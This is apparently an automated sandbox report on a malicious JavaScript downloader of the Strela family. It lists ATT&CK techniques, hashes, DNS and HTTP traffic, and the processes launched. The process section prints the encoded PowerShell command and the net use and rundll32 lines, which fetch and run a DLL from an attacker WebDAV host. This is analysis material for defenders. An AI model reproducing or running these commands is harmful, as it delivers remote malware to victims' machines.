      Command and Scripting Interpreter
      32
      Scripting
      11
      Process Injection
      21
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media11
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS21
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture1
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Rundll32
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      1267026769116073766.js0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://aka.ms/pscore60%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      endpointexperiment.com
      94.159.113.48
      truetrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://aka.ms/pscore6powershell.exe, 00000002.00000002.2324639377.00000214DC05B000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2324639377.00000214DC0AE000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2324639377.00000214DC041000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        94.159.113.48
        endpointexperiment.comRussian Federation
        49531NETCOM-R-ASRUtrue
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1541877
        Start date and time:2024-10-25 09:15:10 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 39s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:11
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • GSI enabled (Javascript)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:1267026769116073766.js
        Detection:MAL
        Classification:mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 1
        • Number of non-executed functions: 2
        Cookbook Comments:
        • Found application associated with file extension: .js
        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target powershell.exe, PID 3792 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: 1267026769116073766.js
        TimeTypeDescription
        03:16:20API Interceptor1x Sleep call for process: net.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        94.159.113.482811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
        • apitestlabs.com:8888/
        2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
        • apitestlabs.com:8888/
        171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
        • apitestlabs.com:8888/
        171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
        • apitestlabs.com:8888/
        28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
        • apitestlabs.com:8888/
        28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
        • apitestlabs.com:8888/
        11625182393171315806.jsGet hashmaliciousStrela DownloaderBrowse
        • endpointexperiment.com:8888/
        68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
        • apitestlabs.com:8888/
        1118121357162151161.jsGet hashmaliciousStrela DownloaderBrowse
        • endpointexperiment.com:8888/
        68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
        • apitestlabs.com:8888/
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        endpointexperiment.com11625182393171315806.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        1118121357162151161.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        1118121357162151161.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        197524037151051602.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        1787914740710731797.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        9848120382647916169.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        577120695346217718.jsGet hashmaliciousUnknownBrowse
        • 94.159.113.48
        577120695346217718.jsGet hashmaliciousUnknownBrowse
        • 94.159.113.48
        1603821452024624760.jsGet hashmaliciousUnknownBrowse
        • 94.159.113.48
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        NETCOM-R-ASRU2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
        • 94.159.113.48
        hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 94.159.101.41
        hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 94.159.101.41
        hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 94.159.101.41
        hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 94.159.101.41
        hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
        • 94.159.101.41
        hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 94.159.101.41
        No context
        No context
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):1.1940658735648508
        Encrypted:false
        SSDEEP:3:Nlllulfj+l/Z:NllUa
        MD5:AEC655F8EE3DD3150DA36365EB66C091
        SHA1:3E4FCCFC1CE43B9802B56898F261467781DB1D33
        SHA-256:9E9E998CAC647B8C511C01A7983633D5DB70C5EC748AD488FE78898A89AB6270
        SHA-512:D98A7A562D940B4DCDA2ECB91DAC0046FD635425E8CF2A8A0646D693050C6A26BB0D704197DCE51E8EDFDD7EBC322B89E1D5FDEB76189B2CF523A0490473F9E0
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:@...e................................................@..........
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Reputation:high, very likely benign file
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        File type:ASCII text, with very long lines (65536), with no line terminators
        Entropy (8bit):4.709914886366145
        TrID:
          File name:1267026769116073766.js
          File size:1'584'590 bytes
          MD5:5ad771c388e585c3006f7b2b35b35f12
          SHA1:7530f9e093674e619c68c4f0201e44f5489218ac
          SHA256:fed183856e7f09bb9f73d8c9d57bd3573ec846da1a49dc1eeb295c845007f5a2
          SHA512:5a902bf6332054580eb3e9a29eae5d2d4ef3c21273e0a982958eb204670e760de9a7cef33ebc150c3673a6f1c0a698ee548a479c0966e2c3b0f784152c3da04b
          SSDEEP:12288:1FjPFJUtFi2rFU2+1bsJnkx3PNtdRwCurgJMCMvriBRcMUjYOMXM9ZXb/vf3/8R0:19P/aF3rL+1YHSdgaV2
          TLSH:E8757D8346691FBE4F571F4203EF53CCA28A67937882FC28B75B911F86AC55DA173821
          File Content Preview:uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzrihhtfwucagtygpywcagpokorqobgoaabpqqhrerpczzxsalwbvuqfflxcrtcdgvzjrmiobefnwzdvhzyhhwxoxvjhzceybtrjjncyqujowroqmlpzcgkfqezwisohsgxbkpknfyqdghfhfxopsbrsayrezpkcu
          Icon Hash:68d69b8bb6aa9a86
          TimestampSource PortDest PortSource IPDest IP
          Oct 25, 2024 09:16:21.174295902 CEST497728888192.168.2.694.159.113.48
          Oct 25, 2024 09:16:21.179764032 CEST88884977294.159.113.48192.168.2.6
          Oct 25, 2024 09:16:21.179860115 CEST497728888192.168.2.694.159.113.48
          Oct 25, 2024 09:16:21.180083036 CEST497728888192.168.2.694.159.113.48
          Oct 25, 2024 09:16:21.185470104 CEST88884977294.159.113.48192.168.2.6
          Oct 25, 2024 09:16:22.102937937 CEST88884977294.159.113.48192.168.2.6
          Oct 25, 2024 09:16:22.145766020 CEST497728888192.168.2.694.159.113.48
          Oct 25, 2024 09:16:22.233926058 CEST497728888192.168.2.694.159.113.48
          TimestampSource PortDest PortSource IPDest IP
          Oct 25, 2024 09:16:21.158090115 CEST5238353192.168.2.61.1.1.1
          Oct 25, 2024 09:16:21.169038057 CEST53523831.1.1.1192.168.2.6
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Oct 25, 2024 09:16:21.158090115 CEST192.168.2.61.1.1.10x91f9Standard query (0)endpointexperiment.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Oct 25, 2024 09:16:21.169038057 CEST1.1.1.1192.168.2.60x91f9No error (0)endpointexperiment.com94.159.113.48A (IP address)IN (0x0001)false
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.64977294.159.113.4888882052C:\Windows\System32\net.exe
          TimestampBytes transferredDirectionData
          Oct 25, 2024 09:16:21.180083036 CEST116OUTOPTIONS / HTTP/1.1
          Connection: Keep-Alive
          User-Agent: DavClnt
          translate: f
          Host: endpointexperiment.com:8888
          Oct 25, 2024 09:16:22.102937937 CEST191INHTTP/1.1 500 Internal Server Error
          Content-Type: text/plain; charset=utf-8
          X-Content-Type-Options: nosniff
          Date: Fri, 25 Oct 2024 07:16:21 GMT
          Content-Length: 22
          Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
          Data Ascii: Internal server error


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:03:16:09
          Start date:25/10/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js"
          Imagebase:0x7ff6ecdc0000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:03:16:11
          Start date:25/10/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:03:16:12
          Start date:25/10/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:4
          Start time:03:16:19
          Start date:25/10/2024
          Path:C:\Windows\System32\net.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\
          Imagebase:0x7ff61a0b0000
          File size:59'904 bytes
          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:6
          Start time:03:16:20
          Start date:25/10/2024
          Path:C:\Windows\System32\rundll32.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry
          Imagebase:0x7ff77ebe0000
          File size:71'680 bytes
          MD5 hash:EF3179D498793BF4234F708D3BE28633
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Call Graph

          • Executed
          • Not Executed
          callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 Function E1C0->F3C2

          Script:

          Code
          0
          uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
            1
            uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
              2
              uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                3
                uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                  4
                  uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                    5
                    uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                      6
                      uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                        7
                        uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                          8
                          uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                            9
                            uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                              10
                              uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                11
                                uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                  12
                                  uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                    13
                                    uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                      14
                                      uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                        15
                                        uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                          16
                                          uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                            17
                                            uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                              18
                                              uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                19
                                                uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                  20
                                                  uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                    21
                                                    uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                      22
                                                      uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                        23
                                                        uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                          24
                                                          uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                            25
                                                            uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                              26
                                                              uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                27
                                                                uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                  28
                                                                  uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                    29
                                                                    uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                      30
                                                                      uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                        31
                                                                        uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                          32
                                                                          uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                            33
                                                                            uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                              34
                                                                              uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                35
                                                                                uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                  36
                                                                                  uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                    37
                                                                                    uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                      38
                                                                                      uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                        39
                                                                                        uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                          40
                                                                                          uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                            41
                                                                                            uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                              42
                                                                                              uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                43
                                                                                                uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                  44
                                                                                                  uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                    45
                                                                                                    uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                      46
                                                                                                      uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                        47
                                                                                                        uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                          48
                                                                                                          uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                            49
                                                                                                            uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                              50
                                                                                                              uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                51
                                                                                                                uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                  52
                                                                                                                  uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                    53
                                                                                                                    uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                      54
                                                                                                                      uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                        55
                                                                                                                        uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                          56
                                                                                                                          uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                            57
                                                                                                                            uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                              58
                                                                                                                              uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                                59
                                                                                                                                uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                                  60
                                                                                                                                  uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                                    61
                                                                                                                                    uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                                      62
                                                                                                                                      uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzr...
                                                                                                                                        63
                                                                                                                                        Function ( '' + uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwla...
                                                                                                                                        • Function("return this") ➔ function anonymous()
                                                                                                                                        • () ➔
                                                                                                                                        • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                        • run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlA...",0,false) ➔ 0
                                                                                                                                        Reset < >
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.2327821400.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffd34730000_powershell.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
